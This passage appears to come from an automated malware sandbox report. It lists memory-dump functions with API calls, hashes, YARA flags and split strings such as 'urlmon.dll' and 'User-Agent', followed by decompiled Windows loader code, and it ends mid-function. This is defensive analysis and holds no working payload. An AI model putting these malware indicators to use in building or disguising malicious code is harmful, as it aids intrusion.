                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                    • Instruction ID: f9435cd92bba46a372c1278d5618214d5be645425fc5aed6f4f888788f9bae5c
                    • Opcode Fuzzy Hash: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                    • Instruction Fuzzy Hash: 83E0D8B85003455FDB14EE78D5D24673B85FF812607509A8AEC5947643C164C91987A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: oL
                    • API String ID: 1279760036-2581261730
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: fb531f36ecf60f8f990f8beeb336912dc4c8dd0bca289f823f6bbc923f289a64
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: E3E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BE185B242C630F9108AF0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: a291e4ec65558c5148eedba6729c149e861a9d856c25b40a8d06025144360991
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC49EA777ACAF88750F018558BE185B242C630E9108AF0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A124
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: be69a164b90f52cdf138f11d4f4c16ae0c8f1d3ca4b73922774bedb9ce3d57f5
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 7E01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F192,0008F192,?,00000000,?,?), ref: 0009A1F0
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 89bb538c540c149beddcab492b13c1476a756bae682638512484373e91ae5804
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: B2E01AB16002086BDB10DF49CC85EE737ADAF89650F018154BE0C57242C930E8108BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Us$: $er-A$gent$urlmon.dll
                    • API String ID: 0-1367105278
                    • Opcode ID: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                    • Instruction ID: ccf50836fcc1ff978268807161ccbe3faaba2a6763f570eb8ff4a1dee30e4c08
                    • Opcode Fuzzy Hash: 322ff36b181f73603f449628b60f3b565e0af28169e45aa51266f965256259f0
                    • Instruction Fuzzy Hash: 9E116A73E0920996EF109F90AC02BFEBBA4EF51714F104155EC0C6B242D2799A0297D6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                    • Instruction ID: fa881e5a02d0fe28abbbd56ef8c28420443e8f6a36599efb038af9d014cd9b8a
                    • Opcode Fuzzy Hash: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                    • Instruction Fuzzy Hash: E7E06837E5A1508A6F14AEA9B4051EAFF60EB9B2607547296CC0C6B207C522D811DAC6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E020D8788(signed int __ecx, void* __edx, signed int _a4) {
                    				signed int _v8;
                    				short* _v12;
                    				void* _v16;
                    				signed int _v20;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				char _v36;
                    				signed int _v40;
                    				char _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				char _v68;
                    				void* _t216;
                    				intOrPtr _t231;
                    				short* _t235;
                    				intOrPtr _t257;
                    				short* _t261;
                    				intOrPtr _t284;
                    				intOrPtr _t288;
                    				void* _t314;
                    				signed int _t318;
                    				short* _t319;
                    				intOrPtr _t321;
                    				void* _t328;
                    				void* _t329;
                    				char* _t332;
                    				signed int _t333;
                    				signed int* _t334;
                    				void* _t335;
                    				void* _t338;
                    				void* _t339;
                    
                    				_t328 = __edx;
                    				_t322 = __ecx;
                    				_t318 = 0;
                    				_t334 = _a4;
                    				_v8 = 0;
                    				_v28 = 0;
                    				_v48 = 0;
                    				_v20 = 0;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v52 = 0;
                    				if(_t334 == 0) {
                    					_t329 = 0xc000000d;
                    					L49:
                    					_t334[0x11] = _v56;
                    					 *_t334 =  *_t334 | 0x00000800;
                    					_t334[0x12] = _v60;
                    					_t334[0x13] = _v28;
                    					_t334[0x17] = _v20;
                    					_t334[0x16] = _v48;
                    					_t334[0x18] = _v40;
                    					_t334[0x14] = _v32;
                    					_t334[0x15] = _v52;
                    					return _t329;
                    				}
                    				_v56 = 0;
                    				if(E020D8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                    					_v56 = 1;
                    					if(_v8 != 0) {
                    						_t207 = E020BE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                    					}
                    					_push(1);
                    					_v8 = _t318;
                    					E020D718A(_t207);
                    					_t335 = _t335 + 4;
                    				}
                    				_v60 = _v60 | 0xffffffff;
                    				if(E020D8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                    					_t333 =  *_v8;
                    					_v60 = _t333;
                    					_t314 = E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    					_push(_t333);
                    					_v8 = _t318;
                    					E020D718A(_t314);
                    					_t335 = _t335 + 4;
                    				}
                    				_t216 = E020D8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                    				_t332 = ";";
                    				if(_t216 < 0) {
                    					L17:
                    					if(E020D8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                    						L30:
                    						if(E020D8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                    							L46:
                    							_t329 = 0;
                    							L47:
                    							if(_v8 != _t318) {
                    								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    							}
                    							if(_v28 != _t318) {
                    								if(_v20 != _t318) {
                    									E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                    									_v20 = _t318;
                    									_v40 = _t318;
                    								}
                    							}
                    							goto L49;
                    						}
                    						_t231 = _v24;
                    						_t322 = _t231 + 4;
                    						_push(_t231);
                    						_v52 = _t322;
                    						E020D718A(_t231);
                    						if(_t322 == _t318) {
                    							_v32 = _t318;
                    						} else {
                    							_v32 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                    						}
                    						if(_v32 == _t318) {
                    							_v52 = _t318;
                    							L58:
                    							_t329 = 0xc0000017;
                    							goto L47;
                    						} else {
                    							E020B2340(_v32, _v8, _v24);
                    							_v16 = _v32;
                    							_a4 = _t318;
                    							_t235 = E020CE679(_v32, _t332);
                    							while(1) {
                    								_t319 = _t235;
                    								if(_t319 == 0) {
                    									break;
                    								}
                    								 *_t319 = 0;
                    								_t321 = _t319 + 2;
                    								E020BE2A8(_t322,  &_v68, _v16);
                    								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                    									_a4 = _a4 + 1;
                    								}
                    								_v16 = _t321;
                    								_t235 = E020CE679(_t321, _t332);
                    								_pop(_t322);
                    							}
                    							_t236 = _v16;
                    							if( *_v16 != _t319) {
                    								E020BE2A8(_t322,  &_v68, _t236);
                    								if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                    									_a4 = _a4 + 1;
                    								}
                    							}
                    							if(_a4 == 0) {
                    								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                    								_v52 = _v52 & 0x00000000;
                    								_v32 = _v32 & 0x00000000;
                    							}
                    							if(_v8 != 0) {
                    								E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                    							}
                    							_v8 = _v8 & 0x00000000;
                    							_t318 = 0;
                    							goto L46;
                    						}
                    					}
                    					_t257 = _v24;
                    					_t322 = _t257 + 4;
                    					_push(_t257);
                    					_v40 = _t322;
                    					E020D718A(_t257);
                    					_t338 = _t335 + 4;
                    					if(_t322 == _t318) {
                    						_v20 = _t318;
                    					} else {
                    						_v20 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                    					}
                    					if(_v20 == _t318) {
                    						_v40 = _t318;
                    						goto L58;
                    					} else {
                    						E020B2340(_v20, _v8, _v24);
                    						_v16 = _v20;
                    						_a4 = _t318;
                    						_t261 = E020CE679(_v20, _t332);
                    						_t335 = _t338 + 0x14;
                    						while(1) {
                    							_v12 = _t261;
                    							if(_t261 == _t318) {
                    								break;
                    							}
                    							_v12 = _v12 + 2;
                    							 *_v12 = 0;
                    							E020BE2A8(_v12,  &_v68, _v16);
                    							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                    								_a4 = _a4 + 1;
                    							}
                    							_v16 = _v12;
                    							_t261 = E020CE679(_v12, _t332);
                    							_pop(_t322);
                    						}
                    						_t269 = _v16;
                    						if( *_v16 != _t318) {
                    							E020BE2A8(_t322,  &_v68, _t269);
                    							if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                    								_a4 = _a4 + 1;
                    							}
                    						}
                    						if(_a4 == _t318) {
                    							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                    							_v40 = _t318;
                    							_v20 = _t318;
                    						}
                    						if(_v8 != _t318) {
                    							E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    						}
                    						_v8 = _t318;
                    						goto L30;
                    					}
                    				}
                    				_t284 = _v24;
                    				_t322 = _t284 + 4;
                    				_push(_t284);
                    				_v48 = _t322;
                    				E020D718A(_t284);
                    				_t339 = _t335 + 4;
                    				if(_t322 == _t318) {
                    					_v28 = _t318;
                    				} else {
                    					_v28 = E020BE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                    				}
                    				if(_v28 == _t318) {
                    					_v48 = _t318;
                    					goto L58;
                    				} else {
                    					E020B2340(_v28, _v8, _v24);
                    					_v16 = _v28;
                    					_a4 = _t318;
                    					_t288 = E020CE679(_v28, _t332);
                    					_t335 = _t339 + 0x14;
                    					while(1) {
                    						_v12 = _t288;
                    						if(_t288 == _t318) {
                    							break;
                    						}
                    						_v12 = _v12 + 2;
                    						 *_v12 = 0;
                    						E020BE2A8(_v12,  &_v68, _v16);
                    						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                    							_a4 = _a4 + 1;
                    						}
                    						_v16 = _v12;
                    						_t288 = E020CE679(_v12, _t332);
                    						_pop(_t322);
                    					}
                    					_t296 = _v16;
                    					if( *_v16 != _t318) {
                    						E020BE2A8(_t322,  &_v68, _t296);
                    						if(E020D5553(_t328,  &_v68,  &_v36) != 0) {
                    							_a4 = _a4 + 1;
                    						}
                    					}
                    					if(_a4 == _t318) {
                    						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                    						_v48 = _t318;
                    						_v28 = _t318;
                    					}
                    					if(_v8 != _t318) {
                    						E020BE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                    					}
                    					_v8 = _t318;
                    					goto L17;
                    				}
                    			}





































                    0x020d89e8
                    0x020d89ed
                    0x00000000
                    0x020d89ed
                    0x020d895a
                    0x020d883e
                    0x020d8841
                    0x020d8844
                    0x020d8845
                    0x020d8848
                    0x020d884d
                    0x020d8852
                    0x020d8b49
                    0x020d8858
                    0x020d886c
                    0x020d886c
                    0x020d8872
                    0x02121b0e
                    0x00000000
                    0x020d8878
                    0x020d8881
                    0x020d888b
                    0x020d888e
                    0x020d8891
                    0x020d8896
                    0x020d8899
                    0x020d8899
                    0x020d889e
                    0x00000000
                    0x00000000
                    0x02121b21
                    0x02121b27
                    0x02121b2e
                    0x02121b42
                    0x02121b44
                    0x02121b44
                    0x02121b4c
                    0x02121b4f
                    0x02121b55
                    0x02121b55
                    0x020d88a4
                    0x020d88aa
                    0x020d88b1
                    0x020d88c5
                    0x02121b5b
                    0x02121b5b
                    0x020d88c5
                    0x020d88ce
                    0x020d88e0
                    0x020d88e5
                    0x020d88e8
                    0x020d88e8
                    0x020d88ee
                    0x020d8900
                    0x020d8900
                    0x020d8905
                    0x00000000
                    0x020d8905

                    APIs
                    Strings
                    • Kernel-MUI-Language-Disallowed, xrefs: 020D8914
                    • Kernel-MUI-Number-Allowed, xrefs: 020D87E6
                    • WindowsExcludedProcs, xrefs: 020D87C1
                    • Kernel-MUI-Language-SKU, xrefs: 020D89FC
                    • Kernel-MUI-Language-Allowed, xrefs: 020D8827
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp
                    Similarity
                    • API ID: _wcspbrk
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 402402107-258546922
                    • Opcode ID: e7ae6d9eebe04eabb924efe5d8851a8cac3170d65592820389afeef4e25e2c4d
                    • Instruction ID: 7ee43e095a27845c9f1bc5acb915da57a90125981b7c2830322865d4a4abc739
                    • Opcode Fuzzy Hash: e7ae6d9eebe04eabb924efe5d8851a8cac3170d65592820389afeef4e25e2c4d
                    • Instruction Fuzzy Hash: 27F1E6B1D01309EFDB62DF98C9849EEBBB9FF08304F14846AE505A7211E7359A45EF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 38%
                    			E020F13CB(intOrPtr* _a4, intOrPtr _a8) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr* _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				intOrPtr _t71;
                    				signed int _t78;
                    				signed int _t86;
                    				char _t90;
                    				signed int _t91;
                    				signed int _t96;
